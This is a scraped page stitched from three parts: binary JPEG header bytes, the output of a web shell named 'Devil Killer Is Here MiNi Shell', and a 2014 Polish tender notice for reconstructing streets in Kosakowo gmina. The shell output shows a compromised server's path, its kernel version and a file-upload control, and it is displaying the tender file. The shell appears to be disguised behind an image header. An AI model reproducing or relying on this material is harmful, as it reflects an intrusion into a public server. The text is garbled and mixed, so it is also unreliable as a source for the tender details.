JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140704/225336-N-2014.html

<p class="kh_header"><b>Kosakowo: PRZEBUDOWA ULIC NA TERENIE GMINY KOSAKOWO II</b><br>
<b>Numer ogłoszenia: 225336 - 2014; data zamieszczenia: 04.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , ul. Żeromskiego 69, 81-198 Kosakowo, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> kosakowo@zgwrp.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA ULIC NA TERENIE GMINY KOSAKOWO II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulic w Gminie Kosakowo. Podpunkty a)÷g) są wspólne dla wszystkich części zamówienia.
Zamówienie zostało podzielone na 3 części:
Część I: Przebudowa ul. Jastruna w m. Suchy Dwór Gmina Kosakowo na podstawie Projektu Wykonawczego Przebudowa ul. Jastruna w m. Suchy Dwór Gmina Kosakowo oraz na podstawie Szczegółowych Specyfikacji Technicznych oraz Stałej Organizacji Ruchu w/w dokumentacji dokumenty opracowane przez DROGADO Tomasz Ślusarz, ul Władysława IV 61/11, 81-384 Gdynia (opracowania Maj 2014r.) w zakresie wykonania drogi dwupasowej o długości około 220m, szerokości 5,5m i nawierzchni bitumicznej. Po obu stronach jezdni do wykonania pobocze gruntowe o szerokości około 1,75m z kruszywa naturalnego. Przekrój poprzeczny daszkowy o nachyleniu spadków 2%. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul. Jastruna stanowiącym załącznik do SIWZ. W zakres robót wchodzą między innymi: tyczenie osi i krawędzi jezdni, wykonanie robót rozbiórkowych istniejącej nawierzchni (płyty yomb, kostka brukowa, płyty chodnikowe, krawężniki betonowe oraz humus), wykonanie korytowania pod podbudowę, wykonanie podbudowy, wykonanie nawierzchni bitumicznej, regulacja włazów i zasuw.
Część II: Przebudowa ul. Necla w m. Suchy Dwór Gmina Kosakowo wraz z wykonaniem  organizacji ruchu na podstawie Projektu Wykonawczego Przebudowa ul. Necla w m. Suchy Dwór oraz na podstawie Specyfikacji Technicznych wykonania w/w ulicy opracowanych przez Pracownia Projektowa DROGOM Piotr Nykiel, ul. Kalinowa 15, 84-400 Kościerzyna (opracowanie Maj 2014r.) w zakresie wykonania drogi na odcinku około 214m (na odcinku od skrzyżowania z ul. Burchardta do skrzyżowania z ul. Kochanowskiego), szerokość jezdni 6m, z nawierzchni bitumicznej, zamkniętej obustronnie krawężnikiem wraz z przebudową czterech skrzyżowań. Łuki na skrzyżowaniach 6m. zgodnie z załącznikami SIWZ. W zakres robót zasadniczych wchodzi wykonanie robót ziemnych (zdjęcie gleby i humusu, wykonanie korytowania), budowę nowych konstrukcji nawierzchni jezdni.
Część III: Przebudowa ul. Poświatowskiej, Herberta, Borowskiego i Baryki w m. Pogórze - Gmina Kosakowo na podstawie Projektu Wykonawczego Przebudowa ulic Poświatowskiej, Herberta, Borowskiego i Baryki w m. Pogórze oraz na podstawie Szczegółowych Specyfikacji Technicznych wraz z wykonaniem Stałej Organizacji Ruchu w/w ulic - dokumenty opracowane przez DROGADO Tomasz Ślusarz, ul Władysława IV 61/11, 81-384 Gdynia (opracowania Maj 2014r.)w zakresie wykonania drogi o nawierzchni bitumicznej oraz z kruszywa łamanego o łącznej długości około 565m. Ulice Herberta, Borowskiego i Poświatowskiej na odcinku pierwszych 45m, zaprojektowano jako drogi dwupasowe o szerokości 5,5m i nawierzchni bitumicznej z poboczami gruntowymi z obu stron jezdni o szerokości 0,75m. na pozostałym odcinku ul. Poświatowskiej zaprojektowano nawierzchnię z kruszywa łamanego o szerokości 5,5m. pozostały teren należy uzupełnić humusem z obsianiem trawą. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul. Poświatowskiej, Herberta, Borowskiego i Baryki stanowiącym załącznik do SIWZ. W zakres robót wchodzą między innymi: tyczenie osi i krawędzi jezdni, wykonanie robót rozbiórkowych istniejącej nawierzchni (płyty yomb, meba, drogowych oraz chodnikowych, kostki betonowej, nawierzchni bitumicznej, krawężników, zdjęcie humusu). Wykonanie wykopów z wywozem ziemi, nasyp gruntu dowiezionego, wykonanie nawierzchni bitumicznej, z kostki betonowej oraz z kruszywa łamanego, humusowanie, wykonanie pobocza z gruntowego z kruszywa naturalnego, regulacja włazów i zasuw.
Zamawiający dysponuje powyższymi Projektami Wykonawczymi, które m.in. wraz z Specyfikacjami Technicznymi i badaniami geotechnicznymi podłoża w wersji papierowej, zostaną udostępnione Wykonawcy w terminie podpisania umowy.
Przed przystąpieniem do przetargu Wykonawca dokona dokładnego rozpoznania co do ryzyka trudności jakie mogą wpłynąć na wykonawstwo przyjętych robót.
a) Wykonawca zobowiązany jest do:
zatrudnienia na swój koszt Kierownika Robót  i prowadzenia dziennika budowy na formularzu dziennika budowy (egzemplarza dziennika dostarczony przez Wykonawcę podlega ostemplowaniu przez Zamawiającego przed przystąpieniem do robót);
przedłożenia Zamawiającemu harmonogramu rzeczowo-finansowego w terminie 3-ch dni roboczych od podpisania umowy;
w terminie 7-dni przed przystąpieniem do robót przedstawienia do akceptacji przez Zamawiającego (Referat GKOŚ) projektu tymczasowej organizacji ruchu na czas prowadzenia robót z uwzględnieniem ochrony ppoż, karetki pogotowia itp. i dostępu do posesji w rejonie robót;
powiadamiania w postaci ogłoszenia publicznego w dwóch wskazanych przez Zamawiającego miejscach o ograniczeniach w użytkowaniu drogi lub innych utrudnieniach w związku z prowadzonymi robotami;
wykonania dokumentacji powykonawczej dla wykonanych obiektów, w tym inwentaryzacji geodezyjnej powykonawczej i operatu kolaudacyjnego; całość dokumentacji powykonawczej należy wykonać w wersji elektronicznej i papierowej po dwa komplety (w formacie PDF, DWG)
zabezpieczenia terenu budowy, celem uniemożliwienia obecności osób trzecich w  sposób zgodny z przepisami Prawa Budowlanego oraz BHP 
ograniczenia do minimum oddziaływania budowy na pobliskie otoczenie
ustawienia na terenie placu budowy toalety przenośnej oraz do utrzymywania stanu sanitarno-porządkowego na wymaganym poziomie.
zabezpieczenia w sposób skuteczny innych budynków lub obiektów, w razie zaistnienia takiej konieczności, ze względu na prowadzone roboty,
zapewnienia obecności kierownika robót na cotygodniowych radach budowy łącznie ze złożeniem pisemnych informacji o postępie robót,
zasilanie placu budowy w energię elektryczną i wodę leży w zakresie Wykonawcy. Koszty pobieranych na budowę mediów w całości obciążają Wykonawcę.
w całym okresie gwarancyjnym Wykonawca ma obowiązek potwierdzania wpływu korespondencji i pisemnego powiadamiania Zamawiającego o każdorazowej zmianie danych teleadresowych. Jeżeli Wykonawca niedopełnia tego obowiązku, korespondencję skierowaną na znane Zamawiającemu adresy i potwierdzoną poprzez operatora korespondencji listowej lub elektronicznej, będzie uznana za doręczoną;
w okresie gwarancyjnym, nie rzadziej niż raz do roku Wykonawca ma obowiązek przeprowadzenia z Zamawiającym przez swojego upełnomocnionego na piśmie Przedstawiciela, przeglądu gwarancyjnego którego ustalenia będą zaprotokołowane i wykonane przez Strony
 zakup i prowadzenie dziennika budowy
b) Pozostałe warunki zamówienia
materiał na podbudowę w postaci kruszywa betonowego (krusz-bet) jest dostępny na placu składowym Zamawiającego w Kosakowie i/ lub w Gdyni na ul. Śmidowicza
Wykonawca będzie na własny koszt pobierał krusz-bet z placu Zamawiającego i na własny koszt dostarczał go na teren budowy,
Wykonawca zobowiązany jest do utrzymywania stanu sanitarno-porządkowego na wymaganym poziomie,
koszty pobieranych na budowę mediów w całości obciążają Wykonawcę,
Zamawiający zastrzega sobie możliwość odstąpienia od części zakresu zamówienia jednakże nie więcej niż 10% wartości całego zamówienia (np. pozostawienie miejsca na wykonanie w przyszłości chodnika z kostki betonowej o szerokości ok 1,5 m na wybranym odcinku,
ocena jakości płyt z demontażu do ponownego wykorzystania odbywać się powinna przy obecności Inspektora Nadzoru,
płyty z odzysku przed ponownym montażem należy oczyścić, przewiduje się 50% odzysk materiału z demontażu, 
przekazanie przedmiotu umowy nastąpi z zachowaniem warunków technicznych i formalnych określonych w Dokumentacji i Umowie,
wykonawca zobowiązany jest do kompletnego uprzątnięcia terenu a także naprawy ewentualnych zniszczeń powstałych w wyniku prowadzonych robót
wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej oraz obowiązującymi w tym zakresie przepisami, normami technicznymi i prawnymi 
wykonawca udzieli Zamawiającemu gwarancji poprawnego i dobrego jakościowo wykonania przedmiotu umowy na okres 36 m-cy od daty jego odbioru. 
roboty podlegają odbiorowi przez nadzór inwestorski na formularzach UG Kosakowo:
przekazanie przedmiotu umowy nastąpi z zachowaniem warunków technicznych i formalnych określonych w Dokumentacji Przetargowej. Ponadto Wykonawca zobowiązany jest do kompletnego uprzątnięcia terenu a także naprawy ewentualnych zniszczeń powstałych w wyniku prowadzonych robót,
warunkiem niezbędnym przystąpienia Zamawiającego do odbioru jest przedstawianie przez Wykonawcę pomiaru powykonawczego z klauzulą geodety dot. zgodności wykonania robót z projektem,
c) Kompletny operat kolaudacyjny powinien zawierać:
1. Materiały przygotowane przez Inspektora Nadzoru - do wglądu w szczególności umowa wraz z dokumentami przetargowymi, rozliczenie końcowe, wyniki badań kontrolnych lub sprawdzających wykonanych przez niezależne laboratorium (w przypadku zlecenia wykonania takich badań przez Inspektora Nadzoru), wyliczenie potrąceń z tytułu złej jakości robót.  
2. Materiały dostarczane przez Wykonawcę :
dokumentacja projektowa ze zmianami naniesionymi i zatwierdzonymi  przez projektanta,
szczegółowe specyfikacje techniczne, 
uwagi i zalecenia Inżyniera/Inspektora Nadzoru i ich wykonanie szczególnie dla robót zanikających  i zakrywanych,
recepty i ustalenia technologiczne, 
dziennik budowy i książka obmiarów,
wyniki pomiarów kontrolnych oraz badań i oznaczeń laboratoryjnych zgodne z SST i PZJ,
atesty jakościowe wbudowanych materiałów,
opinię technologiczną sporządzoną na podstawie wszystkich badań i pomiarów załączonych do dokumentów odbioru, a wykonanych zgodnie z PZJ i SST,
przedłożenia protokołów odbioru pasa drogowego a także wszystkich innych terenów zajmowanych na czas budowy;
protokołów odbioru przyłączy i przebudowy elementów uzbrojenia podziemnego;
sprawozdanie techniczne zawierające:
zakres i lokalizację robót,
uwagi dotyczące realizacji robót,
data rozpoczęcia i zakończenia robót,
geodezyjną inwentaryzację powykonawczą obiektu,
oświadczenie Kierownika budowy o zakończeniu robót wykonanych zgodnie z dokumentacją projektową wraz z naniesionymi zmianami i ich argumentacją (w przypadku ich wystąpienia). 
d) Organizacja ruchu.
Na czas prowadzenia robót ulice należy zamknąć dla ruchu, z wyjątkiem ruchu pojazdów budowy oraz mieszkańców. Wykonawca robót powinien wyznaczyć tymczasowe ciągi piesze. Przed przystąpieniem do ustawienia organizacji ruchu wykonawca zobowiązany jest ustalić tymczasową organizację ruchu z Zarządcą Drogi oraz zawiadomić mieszkańców przyległych posesji o terminie i sposobie prowadzonych robót, w celu zapewnienia bezpiecznego wjazdu i wyjazdu z posesji. 
e) Przy realizacji zamówienia należy uwzględnić poniższe wytyczne Zamawiającego z uwzględnieniem Rozp. Min.Trans.i Gosp.Mor. z dnia 2 marca 1999 r. (z późn.zm) w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie, oraz Ustawy z dnia 07 lipca 1994r. - Prawo budowlane, Ustawy Prawo o ruchu drogowym z dnia 20 czerwca 1997r. oraz Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczenia w drogach.
f) Pozostałe warunki wykonania zamówienia
przekazanie przedmiotu umowy nastąpi z zachowaniem warunków technicznych i formalnych określonych w Dokumentacji i Umowie,
Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej oraz obowiązującymi w tym zakresie przepisami, normami technicznymi i prawnymi,
Wykonawca udzieli Zamawiającemu gwarancji poprawnego i dobrego jakościowo wykonania przedmiotu umowy na okres 36 m-cy od daty jego odbioru.
g) Przekazanie przedmiotu umowy nastąpi z zachowaniem warunków technicznych i formalnych określonych w Umowie.
4. OPIS CZĘŚCI ZAMÓWIENIA.
Na podstawie z art. 32 ust. 4 Zamawiający dopuszcza możliwość składania ofert częściowych.
Zamówienie zostało podzielone na 3 części:
Część I
a) Przedmiotem zamówienia jest przebudowa ul. Jastruna w Suchym Dworze - Gmina Kosakowo:
Wykonanie drogi dwupasowej o długości około 220m, szerokości  5,5m i nawierzchni bitumicznej. Po obu stronach jezdni pobocze gruntowe o szerokości około 1,75m z kruszywa naturalnego. Przekrój poprzeczny daszkowy o nachyleniu spadków 2%. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul. Jastruna stanowiącym załącznik do SIWZ. Szczegółowe określenie zakresu wykonania przebudowy ul. Jastruna wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ.
Część II
b) Przebudowa ul. Necla w suchym Dworze - Gmina Kosakowo:
Wykonanie drogi na odcinku około 214m (na odcinku od skrzyżowania z ul. Burchardta do skrzyżowania z ul. Kochanowskiego) wraz ze stała organizacją ruchu, szerokość jezdni 6m, nawierzchnia bitumiczna, zamknięta obustronnie krawężnikiem wraz z przebudową czterech skrzyżowań. Łuki na skrzyżowaniach 6m. Szczegółowe określenie zakresu wykonania przebudowy ul. Necla wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ.
Część III
c) Przebudowa ul. Poświatowskiej, Herberta, Borowskiego i Baryki w m. Pogórze - Gmina Kosakowo:
Wykonanie drogi o nawierzchni bitumicznej oraz z kruszywa łamanego o łącznej długości około 565m. Ulice Herberta, Borowskiego i Poświatowskiej na odcinku pierwszych 45m, zaprojektowano jako drogi dwupasowe o szerokości 5,5m i nawierzchni bitumicznej z poboczami gruntowymi z obu stron jezdni o szerokości 0,75m. na pozostałym odcinku ul. Poświatowskiej zaprojektowano nawierzchnię z kruszywa łamanego o szerokości 5,5m. pozostały teren należy uzuzpełnic humusem z obsianiem trawą. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul.Poświatowskiej, Herberta, Borowskiego i Baryki stanowiącym załącznik do SIWZ. Szczegółowe określenie zakresu wykonania przebudowy ul. Poświatowskiej, Herberta, Borowskiego i Baryki wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ.
Kruszywo na nawierzchnie ul. Poświatowskiej i Baryki oznaczoną na rysunku Projektu Wykonawczego nr 2.1 Plan sytuacyjny jako proj. nawierzchnia z kruszywa leży po stronie Wykonawcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do zamówienia podstawowego, zgodnie z art. 67. ust.1 pkt.6 ustawy w zakresie 50% wartości zamówienia podstawowego tj. wartości szacunkowej zamówienia obejmujące przedmiot zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1. Ustalona wartość wadium wynosi: Dla części I: 2.500 zł (dwa tysiące pięćset złotych) Dla części II: 2.500 zł (dwa tysiące pięćset złotych) Dla części III: 3.500 zł (trzy tysiące pięćset złotych) 10.2 Każdy Wykonawca zobowiązany jest do wniesienia wadium w terminie składania ofert. Dowód wniesienia wadium należy dołączyć do składanej oferty. 10.3. Wadium może być wniesione w jednej lub kilku formach o których mowa w art. 45 ust.6 ustawy PZP 10.4. Wadia w postaci gotówkowej należy wpłacać konto bankowe BS Rumia nr 65 8351 0003 0000 1267 2000 0040. W przypadku, jeżeli do upływu terminu (wyznaczonego na konkretną godzinę) składania ofert wymagana kwota wadium nie wpłynie na konto zamawiającego, będzie to oznaczało, te wadium nie zostało wniesione, co wiąże się z wykluczeniem wykonawcy i odrzuceniem oferty jako nie zabezpieczonej wadium. 10.5.W przypadku wniesienia wadium w innej formie niż pieniężna, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą, tzn. rozpoczynać się najpóźniej w dniu wyznaczonym na składanie ofert a kończyć najwcześniej po upływie następnych 30-tu dni. 10.6. Zamawiający zatrzymuje wadium (w przypadku formy pieniężnej wraz z odsetkami) jeżeli wykonawca którego oferta została wybrana : odmówił podpisania umowy na warunkach określonych w ofercie nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia publicznego. zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 10.7. Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa wart. 25 ust.1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 10.8. Gwarancja zapłaty wadium winna być bezwarunkowa i płatna na pierwsze żądanie. 10.9. Niespełnienie powyższych wymogów skutkować będzie wykluczeniem wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony jeżeli wykonawca złoży zgodne z prawdą oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania (Formularz B)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony, jeżeli wykonawca złoży wykaz (o którym mowa w punkcie 8.1. b) Siwz co najmniej 2 robót budowlanych polegających na budowie, remoncie lub modernizacji nawierzchni drogi asfaltowej o wartości nie mniejszej niż: dla części I - 100.000 zł netto (sto tysięcy złotych), dla części II - 100.000 zł. netto (sto tysięcy złotych) dla części III - 240.000 zł. netto (dwieście czterdzieści tysięcy złotych) wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że roboty te zostały wykonane lub są wykonywane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. (Formularz C+ dowody należytego wykonania robót)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony, jeżeli wykonawca złoży zgodne z prawdą oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (Formularz B)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony, jeżeli wykonawca złoży zgodne z prawdą oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (Formularz B)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony jeżeli wykonawca złoży zgodne z prawdą oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. (For. B)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
